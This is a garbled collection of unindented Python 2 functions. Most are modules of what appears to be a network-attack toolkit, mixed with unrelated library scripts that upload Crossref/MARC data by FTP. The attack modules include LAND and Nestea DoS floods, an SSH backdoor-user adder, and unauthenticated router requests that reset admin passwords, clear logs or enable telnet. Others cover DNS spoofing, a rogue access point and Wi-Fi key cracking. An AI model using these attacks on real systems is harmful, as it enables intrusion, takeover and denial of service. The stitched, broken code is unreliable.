def update():
"""Run update routine
"""
if not util.does_file_exist('./.git/config'):
util.Error(
'Not a git repo; please checkout from Github with \n\tgit clone http://github.com/hatRiot/zarp.git\n to update.'
)
else:
util.Msg('Updating Zarp...')
ret = util.init_app('git branch -a | grep \'* dev\'', True)
if len(ret) > 3:
util.Error(
'You appear to be on the dev branch. Please switch off dev to update.'
)
return
ret = util.init_app('git pull git://github.com/hatRiot/zarp.git HEAD',
True)
if 'Already up-to-date' in ret:
util.Msg('Zarp already up to date.')
elif 'fatal' in ret:
util.Error('Error updating Zarp: %s' % ret)
else:
from util import version
util.Msg('Zarp updated to version %s' % (version()))
def set(key, value):
""" Sets the key to the vale
@param key is the configuration key
@param value is what to set it to
"""
global CONFIG
if key in CONFIG.opts:
# sometimes we gotta do stuff with the key
if key == 'iface':
if not util.verify_iface(value):
util.Error('\'%s\' is not a valid interface.' % (value))
return
# valid iface, set new ipconfig
new_ip = util.get_local_ip(value)
if new_ip is not None:
set('iface',value)
set('ip_addr', new_ip)
else:
res = util.eval_type(value, CONFIG.opts[key]['type'])
if res[0]:
CONFIG.opts[key]['value'] = res[1]
elif key in CONFIG._opts:
# options not available in CLI
res = util.eval_type(value, CONFIG._opts[key]['type'])
if res[0]:
CONFIG._opts[key]['value'] = res[1]
else:
return
else:
util.Error('Key "%s" not found. \'opts\' for options.' % (key))
def initialize(self):
"""Initialize AP"""
if not util.check_program('airbase-ng'):
util.Error('\'airbase-ng\' not found in local path.')
return False
self.running = True
ap_proc = None
try:
self.mon_adapt = util.get_monitor_adapter()
if self.mon_adapt is None:
self.mon_adapt = util.enable_monitor()
if self.mon_adapt is None:
util.Error('Could not find a wireless card in monitor mode')
return None
airbase_cmd = [
'airbase-ng', '--essid', self.ap_essid, self.mon_adapt
]
ap_proc = util.init_app(airbase_cmd, False)
util.Msg('Access point %s running.' % self.ap_essid)
raw_input() # block
except KeyboardInterrupt:
self.running = False
except Exception, er:
util.Error('Error with wireless AP: %s' % er)
def initialize(self):
"""Initialize the replacer module"""
try:
import nfqueue
except ImportError:
util.Error('nfqueue-bindings not found.')
return None
util.Msg(
'Note: This module currently only supports payload modifications.')
while True:
try:
self.match = raw_input('[!] Match: ')
self.replace = raw_input('[!] Replace with: ')
tmp = raw_input(
'[!] Match %s and replace with %s. Is this correct?[y] ' %
(self.match, self.replace))
if 'n' in tmp.lower():
return
break
except KeyboardInterrupt:
return
except:
util.Error('Invalid input')
continue
# set iptable rules
self.manage_iptable()
thread = Thread(target=self.injector)
thread.start()
# return our display for session management
return '%s -> %s' % (self.match, self.replace)
def Main():
if len(sys.argv) != 2:
util.SendEmail(os.path.basename(sys.argv[0]),
"This script needs to be called with an email address as the only argument!\n", priority=1)
sys.exit(-1)
util.default_email_recipient = sys.argv[1]
try:
config = util.LoadConfigFile()
ftp_host = config.get("FTP", "host")
ftp_user = config.get("FTP", "username")
ftp_passwd = config.get("FTP", "password")
except Exception as e:
util.Error("failed to read config file! (" + str(e) + ")")
# Download data from Crossref:
log_file_name = CreateLogFileName()
crossref_xml_file = "/tmp/crossref.xml"
os.unlink(crossref_xml_file)
util.ExecOrDie("/usr/local/bin/crossref_downloader", [ crossref_xml_file ], log_file_name)
# Upload the XML data to the BSZ FTP server:
ftp = util.FTPLogin(ftp_host, ftp_user, ftp_passwd)
try:
with open(crossref_xml_file, "rb") as xml_file:
ftp.storbinary("STOR crossref.xml", xml_file)
except Exception as e:
util.Error("failed to read config file! (" + str(e) + ")")
os.unlink(crossref_xml_file)
util.SendEmail("Crossref Data Import",
"Successfully imported Crossref data and uploaded it to the BSZ FTP server.", priority=5)
def UpdateAllMarcFiles(orig_deletion_list):
# Create a deletion list that consists of the original list from the
# BSZ as well as all the ID's from the files starting w/ "Diff":
util.Remove("augmented_deletion_list")
if orig_deletion_list is None: # Create empty file.
with open("augmented_deletion_list", "a") as _:
pass
else:
shutil.copyfile("../" + orig_deletion_list, "augmented_deletion_list")
EnsureFileIsEmptyOrEndsWithNewline("augmented_deletion_list")
extract_IDs_script_path = GetPathOrDie("extract_IDs_in_erase_format.sh")
for marc_file_name in glob.glob("*.mrc"):
if not marc_file_name.startswith("Diff"):
continue
if process_util.Exec(extract_IDs_script_path,
args=[marc_file_name, "augmented_deletion_list"],
timeout=100) != 0:
util.Error("failed to append ID's from \"" + marc_file_name
+ "\" to \"augmented_deletion_list\"!")
util.Info("Created an augmented deletion list.")
# Now delete ID's from the augmented deletion list from all MARC-21 files:
delete_ids_path = GetPathOrDie("delete_ids")
for marc_file_name in glob.glob("*.mrc"):
if marc_file_name.startswith("Diff"):
continue
trimmed_marc_file = marc_file_name[:-4] + "-trimmed.mrc"
if process_util.Exec(delete_ids_path, args=["augmented_deletion_list", marc_file_name, trimmed_marc_file],
timeout=200, new_stdout=util.GetLogDirectory() + "/trimmed_marc.log",
new_stderr=util.GetLogDirectory() + "/trimmed_marc.log") != 0:
util.Error("failed to create \"" + trimmed_marc_file + " from \"augmented_deletion_list\" and "
"\"" + marc_file_name + "\"!")
RemoveOrDie(marc_file_name)
RemoveOrDie("augmented_deletion_list")
util.Info("Deleted ID's from MARC files.")
# Now concatenate the changed MARC records with the trimmed data sets:
for marc_file_name in glob.glob("*-trimmed.mrc"):
root_name = marc_file_name[:-19]
diff_name = glob.glob("Diff" + root_name + "*.mrc")[0]
if not util.ConcatenateFiles([marc_file_name, diff_name], root_name + ".mrc"):
util.Error("We failed to concatenate \"" + marc_file_name + "\" and \"" + diff_name + "\"!")
RemoveOrDie(marc_file_name)
RemoveOrDie(diff_name)
util.Info("Created concatenated MARC files.")
# Rename files to include the current date and move them up a directory:
current_date_str = datetime.datetime.now().strftime("%y%m%d")
marc_files = glob.glob("*.mrc")
for marc_file_name in marc_files:
RenameOrDie(marc_file_name, "../" + marc_file_name[:-4] + "-" + current_date_str + ".mrc")
os.chdir("..")
util.Info("Renamed and moved files.")
# Create symlinks with "current" instead of "YYMMDD" in the orginal files:
for marc_file in marc_files:
new_name = marc_file[:-4] + "-" + current_date_str + ".mrc"
util.SafeSymlink(new_name, re.sub("\\d\\d\\d\\d\\d\\d", "current", new_name))
util.Info("Symlinked files.")
return ("GesamtTiteldaten-current.mrc", "Normdaten-current.mrc")
def run(self):
try:
import paramiko
except ImportError:
util.Error('Attack requires Paramiko library.')
return
util.Msg('Adding \'r00t:d3fault\'...')
try:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
connection = ssh.connect(self.ip,
username='******',
password='******',
timeout=3.0)
channel = connection.get_transport().open_session()
# add user
channel.exec_command('system users edit 1')
channel.exec_command('username r00t')
channel.exec_command('password d3fault')
channel.exec_command('save')
connection.close()
except paramiko.AuthenticationException:
util.Error('Default credentials disabled/changed.')
except Exception, e:
util.Error('Error: %s' % e)
return
def Main():
if len(sys.argv) != 2:
util.SendEmail(
os.path.basename(sys.argv[0]),
"This script needs to be called with an email address as the only argument!\n",
priority=1)
sys.exit(-1)
util.default_email_recipient = sys.argv[1]
try:
config = util.LoadConfigFile()
ftp_host = config.get("FTP", "host")
ftp_user = config.get("FTP", "username")
ftp_passwd = config.get("FTP", "password")
directory_on_ftp_server = config.get("Upload",
"directory_on_ftp_server")
except Exception as e:
util.Error("failed to read config file! (" + str(e) + ")")
marc_filename = "/tmp/crossref_marc.xml"
no_of_records = DownloadCrossrefData(marc_filename)
if no_of_records == 0:
email_msg_body = "No new records.\n\n"
else:
ftp = util.FTPLogin(ftp_host, ftp_user, ftp_passwd)
try:
ftp.cwd(directory_on_ftp_server)
except:
util.Error("failed to change directory on the FTP server to \"" +
directory_on_ftp_server + "\"!")
UploadFile(ftp, marc_filename, GenerateRemoteFilename())
email_msg_body = "Uploaded " + str(
no_of_records) + " MARC records to the BSZ FTP server.\n\n"
os.unlink(marc_filename)
util.SendEmail("BSZ Crossref File Upload", email_msg_body, priority=5)
def service_scan(self, block, service):
global services
conf.verb = 0
tmp = []
if service.isdigit():
tmp.append(int(service))
elif ',' in service:
service = service.split(',')
# list of ports
if service[0].isdigit():
service = map(int, service)
# list of services
else:
tmp = []
for i in service:
try:
tmp.append(services[i])
except:
util.Error('\'%s\' is not a supported service.' % i)
continue
elif service in services:
tmp.append(services[service])
else:
util.Error('Service \'%s\' not recognized.' % (service))
return
service = tmp
# parsing is done, we've got a list of integers. SYN the port and pass
# processing off if we need to do service specific querying
try:
(ans, unans) = arping(block)
if 67 in service:
self.dhcp_scan()
for s, r in ans:
ip = r[ARP].getfieldval('psrc')
print '\t[+] %s' % (ip)
for port in service:
if port is 67:
continue
elif port is 161:
self.snmp_query(ip)
continue
elif port is 53:
self.zone_transfer(ip)
continue
pkt = sr1(IP(dst=ip) / TCP(flags='S', dport=port),
timeout=1)
if not pkt is None and pkt[TCP].getfieldval(
'flags') == 18L:
print '\t %d \t %s' % (pkt[TCP].sport, 'open')
if port is services['ftp']:
self.ftp_info(ip)
elif port is services['ssh']:
# todo: change this up so if ssh is on another port...
self.ssh_info(ip, port)
elif port is services['smb']:
self.smb_info(ip)
sr(IP(dst=ip) / TCP(flags='FA', dport=port), timeout=1)
except Exception, j:
util.debug("error: %s" % j)
def initialize_bg(self):
try:
# try importing here so we can catch it right away
import paramiko
except ImportError:
util.Error('Paramiko libraries required for this module.')
return False
while True:
try:
self.priv_key = raw_input(
'Enter private key path or [enter] to generate: ')
if len(self.priv_key) < 2:
self.priv_key = None
else:
# try reading the private key before starting
tmp = paramiko.RSAKey.from_private_key_file(self.priv_key)
break
except IOError:
util.Error('Error reading key.')
continue
except:
pass
util.Msg('Initializing SSH server...')
thread = Thread(target=self.initialize)
thread.start()
return True
def Main():
if len(sys.argv) != 2:
util.Error("This script expects one argument: default_email_recipient")
util.default_email_recipient = sys.argv[1]
config = util.LoadConfigFile()
try:
deletion_list = config.get("Files", "loesch_liste")
complete_data = config.get("Files", "komplett_abzug")
differential_data = config.get("Files", "differenz_abzug")
except Exception as e:
util.Error("failed to read config file! (" + str(e) + ")")
if not os.access(complete_data, os.R_OK):
util.Error("Fehlender oder nicht lesbarer Komplettabzug. (" +
complete_data + ")")
deletion_list_is_readable = os.access(deletion_list, os.R_OK)
if not deletion_list_is_readable:
deletion_list = None
differential_data_is_readable = os.access(differential_data, os.R_OK)
if not deletion_list_is_readable and not differential_data_is_readable:
util.Error(
"Fehlende oder nicht lesbare Löschliste und Differenzabzug..")
# Bail out if the most recent complete data set is at least as recent as the deletion list or the differential
# data:
complete_data_mtime = os.path.getmtime(complete_data)
deletion_list_mtime = None
if deletion_list_is_readable:
deletion_list_mtime = os.path.getmtime(deletion_list)
differential_data_mtime = None
if differential_data_is_readable:
differential_data_mtime = os.path.getmtime(differential_data)
if ((deletion_list_mtime is not None
and complete_data_mtime >= deletion_list_mtime)
or (differential_data_mtime is not None
and complete_data_mtime >= differential_data_mtime)):
util.SendEmail(
"Nichts zu tun!",
"Komplettabzug ist neuer als eventuell vorhandene Differenzabzüge.\n",
priority=5)
sys.exit(0)
data_dir = PrepareDataDirectory(
) # After this we're in the data directory...
util.ExtractAndRenameBSZFiles("../" + complete_data)
util.ExtractAndRenameBSZFiles("../" + differential_data, "Diff")
title_superior_norm_tuple = UpdateAllMarcFiles(
deletion_list) # ...and we're back in the original directory.
new_tarball_name = complete_data.replace(
"current",
datetime.date.today().strftime("%y%m%d"))
CreateNewTarballAndDeletePreviousTarball(new_tarball_name,
title_superior_norm_tuple,
complete_data)
util.RemoveLinkTargetAndLink(title_superior_norm_tuple[0])
util.RemoveLinkTargetAndLink(title_superior_norm_tuple[1])
util.RemoveLinkTargetAndLink(title_superior_norm_tuple[2])
util.Info("Successfully created updated MARC files.")
def initialize(self):
"""Initialize the DNS spoofer. This is dependent
on a running ARP spoof; for now!
"""
try:
arps = None
key = None
if 'ARP Spoof' in stream.HOUSE:
house = stream.HOUSE['ARP Spoof']
else:
util.Error('ARP spoof required!')
return
while True:
stream.dump_module_sessions('ARP Spoof')
try:
num = int(raw_input('[number] > '))
except TypeError:
continue
if len(house.keys()) > num:
key = house.keys()[num]
arps = house[key]
self.source = arps.victim[0]
self.local_mac = arps.local[1]
break
else:
return
dns_name = raw_input('[!] Enter regex to match DNS:\t')
if dns_name in self.dns_spoofed_pair:
util.Msg('DNS is already being spoofed (%s).' %
(self.dns_spoofed_pair[dns_name]))
return
dns_spoofed = raw_input('[!] Spoof DNS entry matching %s to:\t' %
(dns_name))
tmp = raw_input(
'[!] Spoof DNS record \'%s\' to \'%s\'. Is this correct?' %
(dns_name, dns_spoofed))
if 'n' in tmp.lower():
return
dns_name = re.compile(dns_name)
self.dns_spoofed_pair[dns_name] = dns_spoofed
self.running = True
util.Msg('Starting DNS spoofer...')
thread = Thread(target=self.dns_sniffer)
thread.start()
except KeyboardInterrupt:
return None
except re.error:
util.Error('Invalid regex given.')
return None
except Exception, j:
util.Error('Error: %s' % j)
return None
def UploadFile(ftp, local_filename, remote_filename):
try:
local_file = open(local_filename, "rb")
except Exception as e:
util.Error("local open of \"" + local_filename + "\" failed! (" +
str(e) + ")")
try:
ftp.storbinary("STOR " + remote_filename, local_file)
local_file.close()
except Exception as e:
util.Error("File upload failed! (" + str(e) + ")")
def __init__(self):
self.connection = None
db_type = config.get('db_con')
if db_type == 'sqlite3':
self.connection = sqlite3.connect('config/zarp.db',
check_same_thread=False)
elif db_type == 'pgsql':
util.Error('Postgres is not yet supported.')
elif db_type == 'mysql':
util.Error('mysql is not yet supported')
def GetBackupDirectoryPath(config):
try:
backup_directory = config.get("Kumulierte Abzuege", "output_directory")
except Exception as e:
util.Error("could not determine output directory (" + str(e) + ")")
if not os.path.exists(backup_directory):
util.Error("backup directory is missing: \"" + backup_directory +
"\"!")
return backup_directory
def GetFilenameRegexForSection(config, section):
try:
filename_pattern = config.get(section, "filename_pattern")
except Exception as e:
util.Error("Invalid section " + section + "in config file! (" +
str(e) + ")")
try:
filename_regex = re.compile(filename_pattern)
except Exception as e:
util.Error("filename pattern \"" + filename_pattern +
"\" failed to compile! (" + str(e) + ")")
return filename_regex
def menu():
"""Driver for the session management menu
"""
while True:
stream.dump_sessions()
choice = util.print_menu(session_menu)
if choice == 0:
break
elif choice == 1:
(module, number) = stream.get_session_input()
if not module is None:
stream.stop_session(module, number)
elif choice == 2:
(module, number) = stream.get_session_input()
if not module is None:
stream.view_session(module, number)
elif choice == 3:
try:
display = color.B_YELLOW + '[' + color.B_GREEN + '!' + color.B_YELLOW + \
'] Enter file to log to' + color.B_WHITE + ' > ' + color.END
file_path = raw_input(display)
if file_path is None:
return
if util.does_file_exist(file_path) or path.islink(file_path):
util.Error('File already exists.')
return
(module, number) = stream.get_session_input()
if not module is None:
display = color.B_YELLOW + '[' + color.B_GREEN + '!' + color.B_YELLOW + \
'] Log output from %s session %s to %s. Is this correct? ' + \
color.B_GREEN + '[' + color.B_YELLOW + 'Y' + color.B_GREEN + \
'/' + color.B_YELLOW + 'n' + color.B_GREEN + '] ' + \
color.B_WHITE + '> ' + color.END
tmp = raw_input(display % (module, number, file_path))
if 'n' in tmp.lower():
return
stream.toggle_log(module, number, file_path, True)
except KeyboardInterrupt:
return
except Exception:
util.Error('Error logging to given file')
return
elif choice == 4:
(module, number) = stream.get_session_input()
if not module is None:
stream.toggle_log(module, number)
elif choice == -1:
pass
else:
system('clear')
def CleanUpCumulativeCollection(config):
backup_directory = GetBackupDirectoryPath(config)
filename_complete_data_regex = GetFilenameRegexForSection(
config, "Kompletter Abzug")
incremental_authority_data_regex = GetFilenameRegexForSection(
config, "Normdatendifferenzabzug")
# Find the latest complete data file
try:
most_recent_complete_data_filename = GetMostRecentFile(
filename_complete_data_regex,
CumulativeFilenameGenerator(backup_directory))
except Exception as e:
util.Error(
"Unable to to determine the most recent complete data file (" +
str(e) + ")")
if most_recent_complete_data_filename is None:
return None
# Extract the date
match = filename_complete_data_regex.match(
most_recent_complete_data_filename)
if match and match.group(1):
most_recent_complete_data_date = match.group(1)
# Delete all older Files but skip incremental authority dumps
DeleteAllFilesOlderThan(most_recent_complete_data_date,
backup_directory,
incremental_authority_data_regex)
# Now explicitly delete incremental authority dumps that are too old
DeleteAllFilesOlderThan(
ShiftDateToTenDaysBefore(most_recent_complete_data_date),
backup_directory)
return None
def initialize(self):
socker = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socker.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
socker.settimeout(3)
socker.bind(('', self.config['port'].value))
socker.listen(5)
self.running = True
try:
while self.running:
try:
con, addr = socker.accept()
except KeyboardInterrupt:
break
except:
continue
self.log_msg('Connection from %s' % addr[0])
while self.running:
data = con.recv(256)
if not self.handler(con, data):
break
con.shutdown(socket.SHUT_RDWR)
con.close()
self.log_msg('Closed connection with %s.\n' % addr[0])
except KeyboardInterrupt:
self.running = False
except socket.error:
pass
except Exception, j:
util.Error('Error with SMB listener: %s' % j)
self.running = False
def initialize(self):
# supress scapy output
conf.verb = 0
try:
self.target = raw_input('[!] Enter IP to DoS: ')
tmp = raw_input('[!] LAND attack at ip %s. Is this correct? ' %
self.target)
if 'n' in tmp.lower():
return
while True:
print '[!] DoSing %s...' % self.target
send(
IP(src=self.target, dst=self.target) /
TCP(sport=134, dport=134))
if self.is_alive():
util.Msg('Host appears to still be up.')
try:
tmp = raw_input('[!] Try again? ')
except Exception:
break
if 'n' in tmp.lower():
break
else:
util.Msg('Host not responding!')
break
except Exception, j:
util.Error('Error: %s' % j)
return
def run(self):
"""Friendly handler"""
try:
self.running = True
self.sniff_thread.start()
except Exception, e:
util.Error('Error with sniffer: %s' % (e))
def AugmentDeletionList(orig_list, changed_marc_data, augmented_list):
util.Remove(augmented_list)
shutil.copyfile(orig_list, augmented_list)
if process_util.Exec("extract_IDs_in_erase_format.sh", args=[changed_marc_data, augmented_list],
timeout=100) != 0:
util.Error("failed to create \"" + augmented_list + "\" from \"" + changed_marc_data + "\"!")
util.Info("Successfully created \"" + augmented_list + "\".")
def DeleteMarcRecords(original_marc_file, deletion_list, processed_marc_file):
util.Remove(processed_marc_file)
if process_util.Exec("delete_ids", args=[deletion_list, original_marc_file, processed_marc_file],
timeout=200) != 0:
util.Error("failed to create \"" + processed_marc_file + "\" from \"" + deletion_list + "\" and \""
+ original_marc_file + "\"!")
util.Info("Successfully created \"" + processed_marc_file + "\".")
def initialize(self):
version = util.get_input('Enter Zoom version [2/3]: ')
util.Msg('Changing admin password to \'d3fault\'...')
url_25 = 'http://%s/hag/emweb/PopOutUserModify.htm/FormOne&user=admin&'\
'ex_param1=admin&new_pass1=d3fault&new_pass2=d3fault&id=3&'\
'cmdSubmit=Save+Changes' % self.config['target'].value
url_30 = 'http://%s/hag/emweb/PopOutUserModify.htm?id=40&user=admin&'\
'Zadv=1&ex_param1=admin&new_pass1=d3fault&new_pass2=d3fault&'\
'id=3&cmdSubmit=Save+Changes' % self.config['target'].value
url_logs = 'http://%s/Action?id=76&cmdClear+Log=Clear+Log' % self.config[
'target'].value
try:
if version == '2':
urllib.urlopen(url_25).read()
else:
urllib.urlopen(url_30).read()
util.Msg("Password reset, clearing logs...")
urllib.urlopen(url_logs).read()
util.Msg('Done. Connect to %s with admin:d3fault' %
self.config['target'].value)
except Exception, e:
util.Error('Unable to connect: %s' % e)
def initialize(self):
choice = self.config['mode'].value
cmd = []
while True:
if choice is 1:
cmd = ['python',
'src/modules/parameter/wifite.py',
'--wep',
'--wept', '300',
'--nofakeauth']
break
elif choice is 2:
cmd = ['python',
'src/modules/parameter/wifite.py',
'--wpa',
'--wpat', '10',
'--wpadt', '2']
break
elif choice is 3:
cmd = ['python',
'src/modules/parameter/wifite.py',
'--wps',
'--wpst', '5',
'--wpsretry', '8']
break
else:
return False
try:
os.system(' '.join(cmd))
except KeyboardInterrupt:
pass
except Exception, j:
util.Error('Error initializing Wifite: %s' % j)
def initialize(self):
# shut scapy up
conf.verb = 0
try:
self.target = raw_input('[!] Enter IP address to DoS: ')
tmp = raw_input('[!] Nestea DoS IP %s. Is this correct? ' %
self.target)
if 'n' in tmp.lower():
return
while True:
util.Msg('DoSing %s...' % self.target)
send(
IP(dst=self.target, id=42, flags="MF") / UDP() /
("X" * 10))
send(IP(dst=self.target, id=42, frag=48) / ("X" * 116))
send(
IP(dst=self.target, id=42, flags="MF") / UDP() /
("X" * 224))
if self.is_alive():
util.Msg('Host appears to still be up.')
try:
tmp = raw_input('[!] Try again? ')
except Exception:
break
if 'n' in tmp.lower():
break
else:
util.Msg('Host not responding!')
break
except Exception, j:
util.Error('Error with given address. Could not complete DoS.')
return
def initialize(self):
target = self.config['target'].value
try:
pkt1 = IP(dst=target, id=42, flags="MF") / UDP() / ("X" * 10)
pkt2 = IP(dst=target, id=42, frag=48) / ("X" * 116)
pkt3 = IP(dst=target, id=42, flags="MF") / UDP() / ("X" * 224)
while True:
util.Msg('DoSing %s...' % target)
send(pkt1)
send(pkt2)
send(pkt3)
if self.is_alive():
util.Msg('Host appears to still be up.')
try:
tmp = raw_input('[!] Try again? [Y/n] ')
except Exception:
break
if 'n' in tmp.lower():
break
else:
util.Msg('Host not responding!')
break
except KeyboardInterrupt:
return
except Exception:
util.Error('Error with given address. Could not complete DoS.')
return
def initialize(self):
cmd = []
while True:
choice = util.print_menu(self.cracks)
if choice is 1:
cmd = [
'python', 'src/modules/parameter/wifite.py', '--wep',
'--wept', '300', '--nofakeauth'
]
break
elif choice is 2:
cmd = [
'python', 'src/modules/parameter/wifite.py', '--wpa',
'--wpat', '10', '--wpadt', '2'
]
break
elif choice is 3:
cmd = [
'python', 'src/modules/parameter/wifite.py', '--wps',
'--wpst', '5', '--wpsretry', '8'
]
elif choice is 0:
return
else:
continue
break
try:
os.system(' '.join(cmd))
except KeyboardInterrupt:
pass
except Exception, j:
util.Error('Error initializing Wifite: %s' % j)
def run(self):
util.Msg(
'Changing admin password and enabling remote telnet server...')
try:
data = urlencode({
'productid': 'RT-N56U',
'current_page': 'Advanced_System_Content.asp',
'next_page': '',
'next_host': '',
'sid_list': 'LANHostConfig%3BGeneral%3B',
'group_id': '',
'modified': '0',
'action_mode': '+Apply+',
'first_time': '',
'action_script': '',
'preferred_lang': 'EN',
'wl_ssid2': 'wat',
'firmver': '1.0.7f',
'http_passwd': 'd3fault',
'http_passwd2': 'd3fault',
'v_password2': 'd3fault',
'log_ipaddr': '',
'time_zone': 'UCT12',
'ntp_server0': 'pool.ntp.org',
'telnetd': '1'
})
response = urlopen("http://%s/start_apply.htm" % self.ip,
data).read()
if "You cannot Login unless logout another user first" in response:
util.Msg("Another user is logged in, attempt to logout? [y] ")
util.Msg('Done. telnet into %s with \'admin:d3fault\'' % self.ip)
except Exception, e:
util.Error('Error: %s' % e)
def initialize_bg(self):
"""Initialize in background thread"""
if not util.check_program('airbase-ng'):
util.Error('\'airbase-ng\' not found in local path.')
return False
while True:
try:
tmp = raw_input('[!] Enter ESSID [%s]: ' % self.ap_essid)
if len(tmp) > 2:
self.ap_essid = tmp
break
except KeyboardInterrupt:
break
except:
continue
util.Msg('Initializing access point..')
thread = Thread(target=self.initialize)
thread.start()
sleep(2)
if self.running:
return True
else:
return False
